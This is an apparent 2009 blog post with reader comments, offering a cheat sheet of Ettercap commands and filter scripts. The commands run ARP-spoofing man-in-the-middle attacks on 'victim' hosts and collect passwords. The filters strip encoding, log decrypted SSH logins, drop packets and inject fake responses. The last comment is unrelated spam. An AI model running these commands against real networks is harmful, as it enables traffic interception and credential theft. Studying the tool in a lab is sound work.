Wednesday, November 25, 2009

More On Ettercap plus Filter examples

This post is a follow up to my previous post on using and ettercap filter to change some text on the fly throughout an MSN conversation. Finding information on google about ettercap filters wasn't as easy as i would have anticipated, took me several minutes to find useabll info. Below is a summary of my findings and mainly aims as a reference or cheatsheet if you will, for some of its popular uses.

Just to recap, if you havent done your homework on the basics of ettercap yet

Basic Sniffing

Network sniffing in quiet text mode with no arp poisoning or arp scan. Ettercap would listen on the eth0 interface and display only information of interests like passwords.

ettercap –Tzq –i eth0

To sniff traffic between 2 hosts:

ettercap -i eth0 –Tq –M ARP:remote /victim_ip_A/ /victim_ip_B/

'–i':
What interface to listen on
'-Tq':
Run in quiet, Text-mode
'-M ARP:remote':
Perform Man-in-Middle-Mode (MITM) arp spoof between two points or nodes in the network, in our example above, between /victim_ip_A/ /victim_ip_B/.

Sniff multiple hosts by be in the middle of network/nodes and the gateway:

ettercap –i eth0 –T –M arp /192.168.1.1 / /192.168.1.10-20/

Capture traffic on a certain port only:

ettercap –i eth0 –T –M arp /192.168.1.1 / /192.168.1.10-20/23


To sniff traffic between all hosts on the network:

ettercap –T –M arp // //

Note that the above is generally not recommend. Do so would result in network performance degradation as you network card is not powerful enough to process all the network traffic (assuming this a reasonably sized network). A network like this would suffer from packet lots and congestion since their would be alot of retransmissions.

Ettercap is capable of:
• sniffing HTTPS
• Collecting passwords for TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG
• Injecting traffic
• OS fingerprinting

Logging The Output

ettercap –Tq –L filename -M ARP:remote /ip_address_A/ /ip_address_B/

Other useful options
-F use preconfigured or custom filters
-P use plugin (to view plugins use ettercap –TQ press p to view the plugin menu)
-c Compress the output (gzip)

More on Ettercap Filters:
Monitoring web traffic (port 80):
Note: When you monitor web traffic, the packets that you see may come accross in an encoded form. Ettercap needs plain-text traffic in order to effectively filter what it needs to. The encoding type that web pages use from my observations(im not sure or aware of any others) is "Accept-Encoding: gzip, deflate"

Below is a filter that Zaps the encoding to force plain-text communication:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "gzip")) {
replace("gzip", " "); # note: four spaces in the replacement string
msg("whited out gzip\n");
}
}

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "deflate")) {
replace("deflate", " "); # note: seven spaces in the replacement string
msg("whited out deflate\n");
}
}

Replacing text in a packet:
if (ip.proto == TCP && search(DATA.data, "lol")){
replace("lol", "smh");
msg("filter ran");

}

Display a message if the tcp port is 22:
if (ip.proto == TCP) {
if (tcp.src == 22 || tcp.dst == 22) {
msg("SSH packet\n");
}
}


Log all telnet traffic, also execute ./program on every packet:
if (ip.proto == TCP) {
if (tcp.src == 23 || tcp.dst == 23) {
log(DATA.data, "./logfile.log");
exec("./program");
}
}


Log all traffic except http:
if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
log(DATA.data, "./logfile.log");
}


Some operation on the payload of the packet:
if ( DATA.data + 20 == 0x4142 ) {
DATA.data + 20 = 0x4243;
} else {
DATA.data = "modified";
DATA.data + 20 = 0x4445;
}


Drop any packet containing "ettercap":
if (search(DECODED.data, "ettercap")) {
msg("some one is talking about us...\n");
drop();
kill();
}


Log ssh decrypted packets matching the regexp
if (ip.proto == TCP) {
if (tcp.src == 22 || tcp.dst == 22) {
if (regex(DECODED.data, ".*login.*")) {
log(DECODED.data, "./decrypted_log");
}
}
}

Dying packets:
if (ip.ttl <>
msg("The packet will die soon\n");
}

String comparison at a given offset:
if (DATA.data + 40 == "ette") {
log(DATA.data, "./logfile");
}

Inject a file after a specific packet:
if (tcp.src == 21 && search(DATA.data, "root")) {
inject("./fake_response");
}

Replace the entire packet with another:
if (tcp.src == 23 && search(DATA.data, "microsoft")) {
drop();
inject("./fake_telnet");
}

Filter only a specific ip address:
if (ip.src == '192.168.0.2') {
drop();
}

Translate the port of the tcp packet from 80 to 81:
if (tcp.dst == 80) {
tcp.dst -= 1;
tcp.dst += 2;
}

Resources/Good reading:
http://ettercap.sourceforge.net/
http://synjunkie.blogspot.com/2007/10/arp-poisoning.html
http://openmaniak.com/ettercap_filter.php
http://forums.remote-exploit.org/backtrack-v2-0-final/7681-ettercap-filters-2.html
http://www.irongeek.com/i.php?page=security/ettercapfilter

12 comments:

  1. Great post, very useful to make own filter ;) Thank you

    ReplyDelete
  2. Thank you for visiting...Always happy to help

    ReplyDelete
  3. Thanks for the Awesome post. Sadly most of those 'good reading's are no longer available. Do you have any other resources you would like to share regarding Ettercap filters?

    ReplyDelete
  4. I just checked all the links and they are working fine for me. Please try again. Copy the links if you are unable to click on them.

    ReplyDelete
  5. hi,

    I had tried with "Replace the entire packet with another"
    actually another packet(fake packet) which is appending with other packet(which is not suppose to happen).
    contents are not replacing but it is appending with other packet.

    Is there any functions for replacing files in ettercap..?

    Steps I followed:
    created my fake packet
    using filter dropped the packet

    can you suggest me how to go about this..

    ReplyDelete
    Replies
    1. I have not done this in awhile but when i get a chance i will try this in a virtual lab. Once a packet gets dropped, you can inject your own response. For example, a dns request gets sent to a server. When the response comes back you can drop that legit response then inject your own fake dns response. Just an overview of how its intended to be used.

      Delete
  6. */
    Steps I followed:
    - created my fake packet
    - using filter dropped the packet
    - using inject function, injected my fake packet

    ReplyDelete
    Replies
    1. Hey, I am also trying to do the same thing as you i.e. replace the packet by another one. But, I don't know how to create a fake packet. Will you please help me in creating a fake packet? Can you post one example of the same?

      Delete
  7. Hey, I am also trying to do the same thing as you i.e. replace the packet by another one. But, I don't know how to create a fake packet. Will you please help me in creating a fake packet? Can you post one example of the same?

    ReplyDelete
  8. This example is not clear.

    Some operation on the payload of the packet:
    if ( DATA.data + 20 == 0x4142 ) {

    I can't tell if the pointer is in bytes, words, what? Please clarify. It would be nice to compare it to an actual Data.data field from a wireshark capture. Thank you.

    ReplyDelete
  9. This comment has been removed by the author.

    ReplyDelete
  10. I really enjoyed this reflection, I also agree with you regarding using teens as puppets to sell their product. and I notice that on www.howtly.com/what-does-smh-mean/- howtly to be true because I enjoy watching YouTube videos as well. to answer you question I don't feel as if it is a bad thing to help sell some ones product, but most people like you have said, does not even try to product and false advertises .So Keep up the wonderful work.

    ReplyDelete